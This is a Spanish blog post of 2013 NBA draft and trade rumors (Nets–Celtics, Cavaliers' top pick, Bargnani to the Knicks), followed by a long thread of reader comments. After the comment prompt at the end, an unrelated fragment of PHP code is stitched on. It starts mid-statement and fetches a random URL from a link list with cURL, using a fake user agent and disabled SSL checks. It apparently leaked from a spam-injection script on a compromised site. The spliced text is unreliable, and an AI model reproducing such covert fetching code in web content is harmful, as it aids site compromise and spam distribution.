Rumores de draft

27 de June de 2013 por txusma

Los días previos del draft son unos de los más ricos en cuanto a rumores y noticias se refieren. Los equipos se aprestan a cerrar sus equipos técnicos, se posicionan de cara al draft, intentan mejorar o vender sus elecciones, los mocks se suceden… Es un gran momento para publicar otro post de seguimiento. No debemos perdernos detalle.

22h30, 27 de Junio

Menos de 3 horas para que dé comienzo el draft y sólo hay una cosa clara: nadie tiene una idea clara de lo que puede pasar. Os dejamos con los último que se oye en los mentideros de la NBA:

– Suena con fuerza. Los Nets están negociando con los Celtics para hacerse con lo servicios de Paul Pierce y Kevin Garnett a cambio de Gerald Wallace, Kris Humphries y 3 primeras rondas del draft fuera de lotería de años venideros. El traspaso no se podría llevar a cabo antes del día 10 de Julio pero parece que el movimiento va en serio.
– Según varias analistas no deberíamos sorprendernos que Anthony Bennett sea escogido en la tercera elección de los Wizards, ni tampoco que caiga hasta la 10 elección de Portland.
– Los Spurs tienen a Erick Green, uno de los mejores anotadores universitarios (sinó el mejor), en el punto de mira para su elección 28.
– Por su parte a los Celtics les gusta Steven Adams (que será extraño que le llegue) y Kelly Olynyk. El ex base de Miami, Shane Larkin, también entra en las quinielas. Suena también que los Celtics están intentando conseguir una 2ª ronda para draftear al base Phil Pressey.
–  Giannis Antetokounmpo ha declarado que no quiere quedarse 2 años en Europa y prefiere dar el salto a la NBA inmediatamente. Esta “bravuconada” puede costarle un bajón en su elección porque en realidad los GM no confían en que esté listo para aportar ahora mismo y no quieren empezar a pagar a un jugador que está claro que tendrá que pasarse mucho tiempo en la D-League.

11h30, 27 de Junio

A pocas horas del draft los rumores se suceden. Elecciones, traspasos, intereses… todo cabe cuando se habla de ‘mercato’:

JR Smith no ha ejercicido su Player Option y será agente libre a partir del 1 de Julio. Novias no le van a faltar. Los Bucks parecen los más interesados pero Pistons y Suns también están al acecho.
– Los Bobcats no son la excepción y tampoco tienen claro que hacer con su elección.  Se habla de que podrían traspasarla a cambio de un jugador contrastado pero lo más probable es que acaben eligiendo. A la lista de deseos que forma el TOP-6 del draft (Noel, Oladipo, Porter, Bennett, Len, McLemore) se le une Cody Zeller. El interés por el ex jugador de Indiana apunta a que otra posibilidad es que los Bobcats rebajen su elección en el draft para pillarle.
Lamarcus Aldridge no tiene ganas de reconstruir en Portland y le gustaría recalar en Chicago. Los Blazers pedirían a Joakim Noah a cambio. Difícil.
– No se descarta que los Thunder se puedan hacer con un pick TOP-5 para intentar hacerse con Alex Len.
– Y evidentemente los Cavs siguen con idea. Ofrecieron el número 1 del draft a los Pelicans a cambio de Greivis Vasquez, el número 6 y la primera elección del 2014. Con semejantes ofertas no van a traspasar la elección nunca.
– Bulls y Cavaliers son los más interesados en hacerse con los servicios de Thomas Robinson a cambio de una primera ronda media-baja del draft.
– Flip Saunders lo niega pero los rumores apuntan que los Wolves buscan desesperadamente subir posiciones en el draft para hacer con Victor Oladipo o Ben McLemore. Para ello ofrecen un pack formado por su novena elección y Derrick Williams.  Quien sabe si los Bobcats estarían interesados para pillar con la novena elección a Cody Zeller.

15h45, 26 de Junio

– En su intento por colocar el número 1 del draft, los Cleveland Cavaliers lo ofrecieron a los Wolves junto a Dion Waiters y Tristan Thompson por Kevin Love. Flip Saunders rechazó la idea.
– Los Washington Wizards solo contemplan dos opciones para su tercera elección: Otto Porter y Anthony Bennett. Aunque el de ex de los Hoyas es el preferido, los Bobcats (poseedores de la siguiente elección) ya han sondeado el mercado para ver que podrían conseguir por Michael Kidd-Gilchtrist.
– Los Celtics han concertado una serie de workouts de última hora con jugadores de 2ª ronda lo que ha alimentado aún más las especulaciones de un posible traspaso de Paul Pierce a cambio de varias elecciones tardías.
– Los Kings buscan acomodo a Jimmer Fredette. Utah Jazz e Indiana Pacers, poseedores ambos de elecciones bajas de primera ronda podrían estar interesados.

16h00, 25 de Junio

– De todos es sabido que de mediar una buena oferta los Cavaliers no tendrían ningún problema en ponerle un lazo al número 1 del draft y traspasarlo donde sea. El último rumor que ha aparecido es que han ofrecido el número 1 y el 19 a los Blazers a cambio de Lamarcus Aldridge. Si finalmente no pueden traspasar la elección todo parece indicar que la lucha por esa primera elección se reduce a dos nombres: Alex Len y Nerlens Noel.
– A parte de los rumores que conciernen a esa primera elección, los Cavs tienen más frentes abiertos. Podrían hacerse con Shawn Marion  a cambio de una mejora de elección (su 19 por la 13 de los Mavs) y también pueden haber ofrecidos un par de segundas rondas por Paul Pierce.
– Todo apunta a que Eric Bledsoe y Caron Butler acabarán en los Magic a cambio de Arron Afflalo el mismo día del draft.
– Los Minnesota Timberwolves se han fijado en Marshon Brooks para mejorar la posición de escolta. Podrían hacerse con él a cambio de su elección 26 del draft.
– Los Blazers buscan reforzar la posición de pívot y tienen a Nikola Pekovic y Tiago Splitter en el punto de mira. La oferta debería ser muy buena para que sus respectivas franquicias no igualaran. Marcin Gortat también interesa.
– Los Warriors están interesados en hacerse con un primera ronda baja del draft. La más que probable pérdida de Jarrett Jack y Carl Landry unida a la falta de espacio salarial les aboca a ello. Parece que la elección 27 de los Nuggets está disponible. A esas alturas se podrían hacer con algún pívot con experiencia como Mason Plumplee, Gorgui Dieng o Jeff Withey, o un algún base como Isaiah Canaan o Nate Wolters.
–  Los Knicks están muy interesados en Kostas Papanikolaou. Recordemos que traspasaron sus derechos hace un año en el traspaso que llevó a Raymond Felton a la “Gran Manzana”. Ahora podrían ofrecer un par de segundas rondas para recuperar sus derechos y firmarle un contrato.
– El que podría abandonar los Knicks es Chris Copeland. El ex del CB Hospitalet interesa mucho en New Orleans y los Pacers también están al acecho.
– Los Rockets siguen con ganas de traspasar a Thomas Robinson a cambio de una 1ª ronda del draft. De esta manera dispondrían del espacio salarial necesario para ofrecer el máximo a Dwight Howard.

Comenta

46 comentarios a esta entrada

  1. jose_dantley dice:
    #1

    Otro rumor, más antiguo, es que Dallas puede vender la ronda por dinero -al estilo Suns de hace unos años que creo que fueron dos las que vendieron- para tener hueco salarial y entrar en la puja por Howard, aunque también es posible llegar a un acuerdo con un europeo y dejarlo en Europa. Schroeder quiere ir a la NBA ya, Saric no está en el draft, nos quedan Gobert y Antetokoumpo, con la posible duda de si Karasev aceptaría quedarse un año en Rusia.

      Citar

  2. Simon dice:
    #2

    Madremia si es verdad eso de Aldridge… que lo hagan ya con los ojos cerrados vamos.
    Y lo de Marion tambien… que además sería expiring el año que viene osea que sería un movimiento excelente pues subirian 6 posiciones en el draft… y si ya sale lo de Pierce… candidatos directos a top 4 del Este… y con esos movimientos aún estarían en disposición de ofrecer un contrato máximo en la Agencia libre del año que viene… osea movimientos redondos!

      Citar

  3. Melo15 dice:
    #3

    Yo lo de Pierce no me lo creo, y menos por 2 segundas rondas.
    Y el de Aldridge lo dudo amenos que los Blazers quieran reconstruirse y no lo creo.

      Citar

  4. Denise dice:
    #4

    Si Portland traspasa a Aldridge por un pick 1 y 1 pick 19 de un Draft en teoría regular, es para hacerle una lobotomía al General Manager.

      Citar

  5. Txusma dice:
    #5

    Eran los cavs los q ofrecían sus elecciones. En Portland creo que todavía se están riendo.

    Lo de Pierce tampoco parece tan raro. Hablamos de un jugador de 35 años que puede decidir que, una vez finiquitado el proyecto verde, tampoco vale la pena esforzarse demasiado.

      Citar

  6. jose_dantley dice:
    #6

    Lo de Aldridge lo proponen los Cavs. No creo que Portland lo cambie por dos melones de una cosecha regular.

      Citar

  7. Sancho88 dice:
    #7

    Los Kings le han extendido la qualifying offer a Tyreke Evans por 6,9 millones de dólares. Ahora el es agente libre restringido, supongo que eso quiere decir que todas las ofertas que les lleguen a los Kings por Tryeke pueden ser igualadas no? En estas circunstancias, y viendo lo que se apunta por aquí, puede ser que elijan a McCollum, con el que han concertado un segundo entrenamiento. Realmente, McCollum o Burke parecen las opciones claras, luego una tercera opción podría ser Muhammad y como cuarto plato quizá Cody Zeller. A ver qué pasa mañana

      Citar

  8. Ruxixón dice:
    #8

    Muhammad en Sacramento alto riesgo.Por lo que hablan de él no parece el binomio perfecto…quien sabe,hace un año estábamos comentando el draft en directo y T-Rob os cayó y lo veía una opción cojonuda y el tiempo ha dicho que no.También se hablaba mal de Drummond y ahí está,con una pinta bárbara para los años venideros.

    Paja mía, ¿KG en los Wizards qué os parecería?Wall ha pedido ganar ya y están buscando un 4 con tiro,los Celtics están en reconstrucción.No ha salido como rumor ni nada,pero viendo el veto que tendría para ir a Clippers parece de las opciones más potables…¿pick 1 por Garnett?jajajaj

      Citar

  9. Denise dice:
    #9

    Ruxixón: Muhammad en Sacramento alto riesgo.Por lo que hablan de él no parece el binomio perfecto…quien sabe,hace un año estábamos comentando el draft en directo y T-Rob os cayó y lo veía una opción cojonuda y el tiempo ha dicho que no.También se hablaba mal de Drummond y ahí está,con una pinta bárbara para los años venideros.Paja mía, ¿KG en los Wizards qué os parecería?Wall ha pedido ganar ya y están buscando un 4 con tiro,los Celtics están en reconstrucción.No ha salido como rumor ni nada,pero viendo el veto que tendría para ir a Clippers parece de las opciones más potables…¿pick 1 por Garnett?jajajaj

    Y que ofreces mas a parte del pick 3?
    A mi el contrato de Garnett me parece tóxico, y los Wizards tienen tantos contratos basura que no creo que haya mucho que les interese a Boston.

      Citar

  10. Denise dice:
    #10

    un buen articulo que he encontrado por ahí. La mejor y la peor elección de cada franquicia en el Draft

    http://www.dispatch.com/content/stories/sports/2013/06/26/0626-nba-draft-history.html

      Citar

  11. Ruxixón dice:
    #11

    Denise: Y que ofreces mas a parte del pick 3?
    A mi el contrato de Garnett me parece tóxico, y los Wizards tienen tantos contratos basura que no creo que haya mucho que les interese a Boston.

    Pues no sé,un Vesely + Okafor + pick por KG + Terry…la verdad es que Okafor hizo muy buenos partidos la temporada pasasa y es expiring,algo que a Boston le interesaría,pero a Wizards también,que llega la hora de renovar a Wall.Quizás por rendimiento/edad KG no sea ese jugador de antaño pero probablemente sea el nombre lo que de a ese proyecto algo más de seriedad.

      Citar

  12. Simon dice:
    #12

    Pues se está moviendo el rumor de que el pick 3 de Washintong termine en Chicago, se habla del pick 3 + Okafor a cambio de Luol Deng. ¿ Demasiado dan los Wizards no? Deng es muy buen jugador pero tanto como par dar un pick tan alto y un interno más que correcto, su contrato es altísimo pero es un expiring… Supono que el incluirlo será para que cuadre económicamente…
    Por parte de Chicago para mi el traspaso sería buenísimo, Salarialmente apenas hay diferencia, mismo dinero y un año de contrato y en lo deportivo añades mas madera para tu zona y con el pick 3 podrían piyar a Oladipo, McLemore o Porter que los tres les vendrían de lujo.
    Un equipo con Rose, Oladipo, Butler, Okafor y Noah…. a ver quien les mete una canasta!
    McLemore caería aqui que ni pintado. Aportaría desde el primer día tiro exterior y capacidad de anotación que es algo que necesitan los Bulls como agua de mayo.
    Porter es un jugador más del estilo de Deng, les vendría bien, pero sin duda que los otros dos candidatos les vendrían mucho mejor a Chicago,

      Citar

  13. Simon dice:
    #13

    Por cierto, cuanto más cosas veo de este draft, más me gusta.
    Será pobre en estrellas pero es profundísimo. Hay muchos jugadores interesantes hasta en el comienzos de la segunda ronda. Apuesto a que dentro de 7 u 8 años vemos más jugadores en la liga de este draft que del tan cacareado draft de 2014 que viene cargado de estrellas pero sin tanta profundida. De aqui no saldran estrellas pero saldrán muchos jugadores sólidos de equipos.

      Citar

  14. Denise dice:
    #14

    Suena tambien que los Bobcats eligirán su pick 4 y luego lo empaquetaran hacia algun equipo por algun jugador contrastado.
    Parece que no quieren jugarsela con otro melón sin abrir.

    Sobre el trade que comenta Simon, Deng tambien es expiring y aportaria desde el minuto 1, pero tanto con Deng como sin él, los Wizards la proxima temporada no tienen opciones ni de semifinales de conferencia, para mi lo mas sensato sería pillar a Porter, te quedas fuera de PO otra vez, el año que viene pillas a otro top 10, y para la 15-16 tienes un equipo joven, relativamente baratoy con dinero para fichar agentes libres.

      Citar

  15. rumbero dice:
    #15

    Simon:
    Pues se está moviendoel rumor de queel pick 3 de Washintong termine en Chicago, se habla del pick 3 + Okafor a cambio de Luol Deng. ¿ Demasiado dan los Wizards no? Deng es muy buen jugador pero tanto como par dar un pick tan alto y un interno más que correcto, su contrato es altísimo pero es un expiring… Supono que el incluirlo será para que cuadre económicamente…
    Por parte de Chicago para mi el traspaso sería buenísimo, Salarialmente apenas hay diferencia, mismo dinero y un año de contrato y en lo deportivo añades mas madera para tu zona y con el pick 3 podrían piyar a Oladipo, McLemore o Porter que los tres les vendrían de lujo.
    Un equipo con Rose, Oladipo, Butler, Okafor y Noah…. a ver quien les mete una canasta!
    McLemore caería aquique ni pintado. Aportaría desde el primer día tiro exterior y capacidad de anotación que es algo que necesitan los Bulls como agua de mayo.
    Porter es un jugador más del estilo de Deng, les vendría bien, pero sin duda que los otros dos candidatos les vendrían mucho mejor a Chicago,

    Por lo que he leido esto lo han empezado a mover los Bulls, supongo que a sabiendas que en Washington tienen un ojo puesto en Wall y su renovación y que hay que empezar a ganar ya. A mi tb me parece que salen ganando los Wizards, no tanto por Okafor que es un sospechoso habitual a pesar de su temporada más que correcta sino por ese pick tan alto. Como dices se pueden llevar una de estas piezas que tan bien parece que les podría venir. Y se quitan de encima la renovación de Deng y a Emeka la temporada que viene si no convence.
    Por cierto que Larry vuelve a Pacers como jefe de operaciones. Muy buena noticia para Indiana

      Citar

  16. rumbero dice:
    #16

    rumbero: A mi tb me parece que salen ganando los Wizards

    Donde dije Wizards digo Chicago

      Citar

  17. Simon dice:
    #17

    rumbero:
    Por cierto que Larry vuelve a Pacers como jefe de operaciones. Muy buena noticia para Indiana

    Notición! Alguien sabe porque salió de Indiana? porque creo que vuelve al mismo puesto tan sólo un año despues…

    En cuanto a lo Okafor en el pack es algo necesario para arreglar el traspaso económicamente, repasando los contratos q tienen ambos equios no veo ninguna otra manera de arreglarlo. ( sin que ninguno de los dos equipos pierdan jugadores clave )
    Okafor es un sospechoso habitual pero reforzaría la zona una barbaridad aun a su nivel “se dejaba llevar” y además en caso de no dar ni eso, siempre te keda la opción de empaquetarlo a algún equipo que esté haciendo hueco para abordar la agencia libre…

      Citar

  18. Simon dice:
    #18

    Por cierto si este trade se lleva a cabo, que no creo. Los Wizards quizás estarían corriendo demasiado para no llegar a ningún lado.

      Citar

  19. rumbero dice:
    #19

    Simon:
    Notición! Alguien sabe porque salió de Indiana? porque creo que vuelve al mismo puesto tan sólo un año despues…

    En cuanto a lo Okafor en el pack es algo necesario para arreglar el traspaso económicamente, repasando los contratos q tienen ambos equios no veo ninguna otra manera de arreglarlo. ( sin que ninguno de los dos equipos pierdan jugadores clave )
    Okafor es un sospechoso habitual pero reforzaría la zona una barbaridad aun a su nivel “se dejaba llevar” y además en caso de no dar ni eso, siempre te keda la opción de empaquetarlo a algún equipo que esté haciendo hueco para abordar la agencia libre…

    Si no recuerdo mal era por problemillas de salud y para descansar un poco. Es la mejor incorporación que podían hacer estos Pacers visto los movimientos que ha hecho Walsh sin él (Green, Young, Augustin…) y teniendo en cuenta que la base del equipo fue cosa suya prácticamente.

    A Okafor le pongo esa etiqueta por el sueldo que tiene el amigo, pero si, les quedaría una pintura de lo más apañada aunque también suena que se quieren sacar de encima a Boozer como sea

      Citar

  20. Vader dice:
    #20

    Lo que tiene mala pinta es la próxima temporada de Knicks… Es muy posible que JR Smith se escape, muchos le ofreceran más de los 5,5 millones que pueden los Knicks y por mucho que se quiera quedar si le ofrecen 3 o 4 años a 7 u 8 kilos lo normal es que se vaya, la pasta es muy importante.

    Esperemos que Shumpert siga mejorando pero nos quedamos con la base: Felton, Shumpert, Melo y Chandler + más la aportación limitada de minutos de Stat. Y este es el verdadero problema, los problemas físicos de Stat lo hacen intraspasable, como mínimo hasta el próximo verano que será expiring. Si a esto sumamos el contrato muy alto de Chandler nos encontramos con pocas buenas piezas y muy poco margen. Y encima para el año que viene no tenemos elección de draft!!

    Es una pena pero me temo que la próxima temporada, y aunque no lo puedan reconocer, será de transición para los Knicks. Hasta que se acaben o sean expiring los contratos de Stat y Chandler no hay margen de mejora y hasta jugadores como Copeland o el citado JR Smith tienen muchos números de volar…

      Citar

  21. Melo15 dice:
    #21

    Vader me tempo que el año que viene estamos en manos de las lesiones, si Felton, Stat y Chandler se libran de los problemas fisicos volveremos a ser competitivos pero si no…
    De todas maneras JR dijo que se queria retirar en los Knicks y yo creo que le da mas prioridad a vivir en NY que a cobrar 1.5 mas. No lo veo para nada firmando como Milwaukee o con Utah.
    Ademas no creo que a los Knicks les importe mucho pasarse del tope no?

      Citar

  22. Vader dice:
    #22

    El caso es que le pueden pagar 5,5 como mucho, no tienen posibilidad de darle más según las normas. Efectivamente no es problema de que no quieran gastar más.

      Citar

  23. Simon dice:
    #23

    De acuerdo Melo, yo creo q JR sería capaz de perdonar dinero para quedarse en NY. Pero NYK le puede ofrecer hasta 5.5 y siempre habrá algun descerebrado q le ofrezca esos 7 u 8 M x temporada durante 4 años… y eso supondría perdonar entre 6 y 10 M de Dolares y eso si que no creo que lo perdone JR…
    A ver que pasa… todo depende de lo que se lien otros equipos la manta a la cabeza. Por muy bueno que sea y en condiciones normales podría llegar a justificar esos 7 u 8… pero su cabeza en algún momento fallará… demasiado riesgo creo es firmar a JR algo largo y voluminoso

      Citar

  24. Vader dice:
    #24

    Parece que DH12 se ira de Lakers, cuanto daño a hecho a Lakers el fichaje de D’antoni…

      Citar

  25. rumbero dice:
    #25

    Simon:
    De acuerdo Melo, yo creo q JR sería capaz de perdonar dinero para quedarse en NY. Pero NYK le puede ofrecer hasta 5.5 y siempre habrá algun descerebrado q le ofrezca esos 7 u 8 M x temporada durante 4 años… y eso supondría perdonar entre 6 y 10 M de Dolares y eso si que no creo que lo perdone JR…
    A ver que pasa… todo depende de lo que se lien otros equipos la manta a la cabeza. Por muy bueno que sea y en condiciones normales podría llegar a justificar esos 7 u8… pero su cabeza en algún momento fallará… demasiadoriesgo creo es firmar a JR algo largo y voluminoso

    Yeah. Es que si le dan esa pasta no habrá suficientes garitos en NY para intentar retenerlo

    Lo último segun Wojnarowski es que Boston y Nets pueden estar hablando para que Garnett y Pierce acaben en Brooklyn a cambio del contrarto de Humphries, Wallace y 3 primeras rondas. Como le gusta al ruso estar en todos los fregaos…demasiado creo yo para dos tios tan curtidos

      Citar

  26. Vader dice:
    #26

    Si se hiciera el traspaso el quintento de Nets seria espectacular; Deron, Joe J, Pierce, Garnett, Lopez…. Aunque creo que harian buena regular season pero les faltarían piernas y defensa en playoff…

      Citar

  27. Simon dice:
    #27

    Bargniani a los Knicks.
    A Toronto se van Novak, Camby y una primera ronda de 2016…

    ¿ Como lo veis? Yo no se que pensar… Toronto bien que se libra de Bargniani… el contrato de Novak es asumible… y Camby, supongo que se retirará antes que jugar en Toronto.

      Citar

  28. Simon dice:
    #28

    Yo no lo termino de ver para NYK… Deportivamente bien, Bargniani no es nada del otro mundo pero teniendo en cuenta que apenas dan nada… pues… el tema es lo económico que lo comprometen todavía mas… además este traspaso puede suponer el adiós defintiivo de JR Smith

      Citar

  29. rumbero dice:
    #29

    Esos knickerbockers que no lo veiais claro… que tal ahora con Bargnani? O_o
    Anda que ha tardado Ujiri en ponerle el lazo. Novak, Camby y una primera ronda

      Citar

  30. rumbero dice:
    #30

    Yo no lo veo tampoco, pero es que a mi el italiano me gusta entre poco y nada. No tendrá esa presión de jugador franquicia que se le suponia en Toronto eso si, pero tengo serias dudas de que necesitaran algo así los Knicks y mas andando Stat ya por ahí. Luego ya esta el tema econónomico que los dejará pillados…y que regalan otra ronda again

      Citar

  31. Vader dice:
    #31

    Pillados ecónomicamente estamos igual. A JR Smith le podemos ofrecer lo mismo con Bargiani que sin él… los 5,58$. Y luego sólo nos queda la mini-mid level y contratos mínimos para veteranos.

    Deportivamente bien, Bargiani ahora mismo es más que Camby+Novak, pero no nos sacará de pobres… Nos da un frontcourt muy versátil y difícil de defender. Hay que ver si se mantiene sano.

    Y mirando a largo plazo, por una parte muy mal porque soltamos otra primera ronda y creo que no tenemos ninguna hasta 2017 (juas, juas, juas) y la parte buena es que el contrato de Bargiani acaba un año antes que el de Novak, en 2015. El mismo año que acaban contrato Melo, Stat y Chandler.

    En fin, me deja bastante frio el traspaso…

    Saludos

      Citar

  32. Denise dice:
    #32

    Supongo que esto significará la amnistía para Stoudemire, no?

    Pues yo creo que sale ganando NY claramente. El contrato de Bargnani es asumible y todavía creo que es un jugador capaz de resolver partidos.
    En cambio, Toronto creo que se equivoca, podrían haber sacado algo mejor por Bargnani, y en cambio se comen el contrato de Camby que no les va a aportar nada en pista, y el de Novak que solo es un buen suplente para hacer de microondas desde el triple.

      Citar

  33. Vader dice:
    #33

    La amnistía la usamos con Billups para poder fichar a Tyson Chandler, así que creo que a Stat nos lo comemos porque es intraspasable con sus problemas físicos.

    Saludos

      Citar

  34. Melo15 dice:
    #34

    Pues a mi el traspaso me gusta bastante. Es verdad que no es nada del otro mundo y que en defensa es un coladero, pero los triples los mete y hay que decir que este año Melo ha estado muy solo en ataque.
    Analizando friamente el traspaso, los Knicks han dado a Camby y Novak ( 10 M) por Bargnani (11 M). Yo creo que el italiano es mejor que Novak y Camby.
    No nos va a dar un anillo pero esta bastante bien.

      Citar

  35. rumbero dice:
    #35

    Melo15:
    Pues a mi el traspaso me gusta bastante. Es verdad que no es nada del otro mundo y que en defensa es un coladero, pero los triples los mete y hay que decir que este año Melo ha estado muy solo en ataque.
    Analizando friamente el traspaso, losKnicks han dado a Camby y Novak ( 10 M) por Bargnani (11 M). Yo creo que el italiano es mejor que Novak y Camby.
    No nos va a dar un anillo pero esta bastante bien.

    Novak, Camby…y ahora ya se habla de 3 rondas, no nos las dejemos que aunque no vayan a ser TOP-5 no estan de más en el trade. Está claro que los dos primeros iban a aportar poco y que se puede asumir el contrato del italiano, pero otra cosa es lo rentable que te salga pagarle 10 kilos si sigue con el historial de lesiones de las últimas temporadas y a ese nivel de juego. Pero vaya, que aunque se acerque al mejor Bargnani de los Raptors, yo me acuerdo de la eliminatoria contra Pacers y el baño en la pintura y en el rebote y sigo pensando que con esos 10 kilos los Knicks podrían haber buscado algo más necesario.

    Y sobre si Raptors podrían haber sacado algo mejor….pues igual si, pero no llevaban tiempo intentando colocarlo ni nada. Camby es probable que se retire antes de acabar su contrato y las rondas siempre vienen bien. Bien por Ujiri

      Citar

  36. Denise dice:
    #36

    rumbero: Y sobre si Raptors podrían haber sacado algo mejor….pues igual si, pero no llevaban tiempo intentando colocarlo ni nada. Camby es probable que se retire antes de acabar su contrato y las rondas siempre vienen bien. Bien por Ujiri

    Bueno…se habla que han rechazado a David Lee, para qudarse con el trade propeusto por NY aunque éste le quedan como 40 millones por cobrar, yo hubiera preferido montarme un gran frontcourt con Gay-Lee-Valanciunas.
    Mal Toronto a mi juicio, a no ser que haya por ahí una letra pequeña que desconocemos..

      Citar

  37. Vader dice:
    #37

    Yo he leido que es una primera ronda de 2016 y dos futuras segundas rondas. Si fueran 3 primeras rondas el traspaso sería horrible para Knicks…

      Citar

  38. rumbero dice:
    #38

    Denise: Bueno…se habla que han rechazado a David Lee, para qudarse con el trade propeusto por NY aunque éste le quedan como 40 millones por cobrar, yo hubiera preferido montarme un gran frontcourt con Gay-Lee-Valanciunas.
    Mal Toronto a mi juicio, a no ser que haya por ahí una letra pequeña que desconocemos..

    Ostras eso no lo había leido. Pues de primeras no suena mal no. Nose, luego ya entra en juego el proyecto que quieran montar. Lee tiene 30 años y le quedan 3 años cobrando unos 43 millones. Si en Toronto quieren montar algo a medio/largo plazo igual no era el mejor de los negocios cambiarlo por Lee. Seguramente no acaben los movimientos ahí…
    Ya digo, que igual si podrían haberse traido mejores piezas por él, pero es que a mi con lo poco que me gusta Bargnani si se lo hubieran sacado de encima por Camby y un par de bolsas de pipas me hubiera seguido pareciendo un negocio redondo 😀

      Citar

  39. Simon dice:
    #39

    Denise: Bueno…se habla que han rechazado a David Lee,

    Vamos a ver… en serio alguien cree en su sano juicio y uso pleno de sus facutades mentales, que fuera posible que GSW hubiera ofrecido a Lee por Bargniani??? Es que no le veo ningún sentido ni le doy credibilidad ninguna a ese rumor que comentas…

    Melo15:

    Analizando friamente el traspaso, losKnicks han dado a Camby y Novak ( 10 M) por Bargnani (11 M).

    Económicamente es Camby y Novak (7M) y Bargniani ( 11 ). Lo que comentas deportivamente el traspaso es casi inmejorable, Bargniani no te saca de pobre pero es que quitado esa primera ronda apenas estas dando nada de buen valor real actualmente.

    rumbero:
    Ya digo, que igual si podrían haberse traido mejores piezas por él, pero es que a mi con lo poco que me gusta Bargnani si se lo hubieran sacado de encima por Camby y un par de bolsas de pipas me hubiera seguido pareciendo un negocio redondo

    Yo creo que era muy complicado sacar nada mejor… es un tio que se lesiona mucho y que su única faceta es ser la de anotador, pq otra cosa no hace…
    Es buen traspaso para los dos, porque bien mirado los Knicks economicamente ya estaban muy piyados y la única forma de reforzarse sin cap ni expirings es esta…

      Citar

  40. Vader dice:
    #40

    http://m.basketball.realgm.com/article/228502/drafting-small-thinking-small

    Un artículo muy interesante sobre las reconstrucciones de Cavs y Wizards y el porque cree que Pistons lo estan haciendo mejor.

    Saludos

      Citar

  41. Simon dice:
    #41

    Vader:
    http://m.basketball.realgm.com/article/228502/drafting-small-thinking-small

    Un artículo muy interesante sobre las reconstrucciones de Cavs y Wizards y el porque cree que Pistons lo estan haciendo mejor.

    Saludos

    Muchísima razón y es que la elección de A.Bennet no se termina de entender porque son dos jugadores que tienen que jugar de 4 si o si… ya muchos criticamos que el año pasado se escogiera a Tristan Thompson en lugar de Valanciunas… y es que es precisamente lo que dice el artículo es más complicado encontrar un 5 bueno que un 4… y este año vuelven a elegir un 4… lo mismo les irá bien pero está claro que no siguen un camino recto. Es que no veo jugando a los dos ( Bennet y Thompson ) juntos en el futuro…

      Citar

  42. Simon dice:
    #42

    Por cierto se nos ha escapado un movimiento que puede ser importante en el futuro. Thomas Robinson a los Blazers a cambio de los derechos de Papanikolau, Todorovic y dos picks de segunda ronda. Ya han hecho espacio para Howard. Sólo falta que firme…

      Citar

  43. rumbero dice:
    #43

    Simon:
    Por cierto se nos ha escapado un movimiento que puede ser importante en el futuro. Thomas Robinson a los Blazers a cambio de los derechos dePapanikolau, Todorovic y dos picksde segunda ronda. Ya han hecho espacio para Howard. Sólo falta que firme…

    Ya te digo. Además han cortado a Brooks y Delfino (a este no le van a faltar novias) Y se ve que también le han puesto el cartelito de en venta a Lin. Como le gusta el veranito a Morey

    A mi el movimiento que se me había escapado es el Darrell Arthur + pick 55(Lauvergne) por Koufos. Randolph/Davis, Gasol/Koufos suena bastante bien y…veremos más minutos de McGee?!?! Shaqtin’ A Fool lo agradecerá

      Citar

  44. Denise dice:
    #44

    Simon: -Vamos a ver… en serio alguien cree en su sano juicio y uso pleno de sus facutades mentales, que fuera posible que GSW hubiera ofrecido a Lee por Bargniani??? Es que no le veo ningún sentido ni le doy credibilidad ninguna a ese rumor que comentas…

    Es un rumor que circula por ahí…
    Obviamente, Lee es mejor que el italiano de aquí a Lima, pero a lo mejor los Warriors tras sus extraordinarios Playoffs sin Lee han visto que pueden sobrevivir sin él, y se quieren quitar de en medio su contrato.
    También se habla de la posibilidad de que Howard recale en GSW mediante sign and trade y la moneda de cambio sería Lee.

      Citar

  45. txusma dice:
    #45

    rumbero: Ya te digo. Además han cortado a Brooks y Delfino (a este no le van a faltar novias) Y se ve que también le han puesto el cartelito de en venta a Lin. Como le gusta el veranito a Morey

    A mi el movimiento que se me había escapado es el Darrell Arthur + pick 55(Lauvergne) por Koufos. Randolph/Davis, Gasol/Koufos suena bastante bien y…veremos más minutos de McGee?!?! Shaqtin’ A Fool lo agradecerá

    Gran movimiento de los ositos. Consiguen un recambio muy válido para Marc y abren hueco para Ed Davis. Perfecto.

      Citar

  46. Ruxixón dice:
    #46

    A mí lo de Toronto no me pilla por sorpresa,me extrañaba mucho que un equipo así se metiera en ese montante de salarios tan a la ligera.Suena que DeRozan tiene todas las papeletas para irse traspasado también,supongo que intentado rebajar un poco más las nóminas a pagar.Con Ross ahí yo lo haría,un quinteto:

    Lowry (fichaje) – Ross (Fields) – Gay (Fields/Kleiza) – Amir (Novak) – Valenciunas(Camby/Gray)

    más lo que pueden sacar por DeRozan,quizás base de rotación,quizás un 4 para ser titular dejando a Amir de 6º hombre,tiene buena pinta para ser el este.Reciben poco pero es que es Bargnani…me mola que vaya Camby al equipo que lo drafteo si no me equivoco aunque no sé qué planes tendrán para él.De todas formas es este año y la temporada que viene es parcialmente garantizado.

    Por cierto,equipín majo el de los Blazers a la chita callando.A lo tonto y a falta de ese center que seguro llegará,han llegado Thomas Robinson,McCollum y Whitey,mejorando banquillo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } 